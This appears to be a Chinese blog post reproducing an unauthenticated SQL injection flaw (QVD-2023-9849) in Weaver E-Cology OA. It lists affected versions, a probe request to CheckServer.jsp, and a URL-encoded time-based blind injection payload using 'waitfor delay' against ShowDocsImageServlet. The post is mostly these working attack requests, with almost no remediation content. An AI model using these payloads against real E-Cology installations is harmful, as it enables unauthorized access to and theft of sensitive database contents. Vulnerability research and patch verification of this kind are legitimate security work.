泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

泛微E-Cology CheckServer.jspSQL注入漏洞(QVD-2023-9849) 复现

1.漏洞描述

泛微 Ecology OA 系统对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。

影响版本:泛微 Ecology 9.x <= v10.56;泛微 Ecology 8.x <= v10.56

2.漏洞复现

POC

复制代码
/mobile/plugin/CheckServer.jsp?type=mobileSetting

返回状态码200且参数值为{"error";"system error"}证明漏洞存在

进行延时注入:

复制代码
/weaver/weaver.docs.docs.ShowDocsImageServlet?docId=1%2F**%2Fand(select%2F**%2F1)%3E0%2F**%2Fwaitfor%2F**%2Fdelay'0%3A0%3A10'%2F**%2F

0%3A0%3A10 实际上表示 0:0:10 延时10秒
相关推荐
fatsheep洋9 小时前
cacti的RCE
web安全·安全性测试
一口一个橘子11 小时前
[ctfshow web入门]web99 in_array的弱比较漏洞
web安全·网络安全·php
波吉爱睡觉12 小时前
Redis反弹Shell
redis·web安全·网络安全
wha the fuck40413 小时前
攻防世界-引导-Web_php_unserialize
安全·web安全·网络安全·php
吃不得辣条19 小时前
网络安全笔记
笔记·web安全·智能路由器
还是奇怪1 天前
深入解析三大Web安全威胁:文件上传漏洞、SQL注入漏洞与WebShell
sql·安全·web安全
终焉暴龙王2 天前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川2 天前
Apache文件解析漏洞
web安全·apache
希望奇迹很安静3 天前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南3 天前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全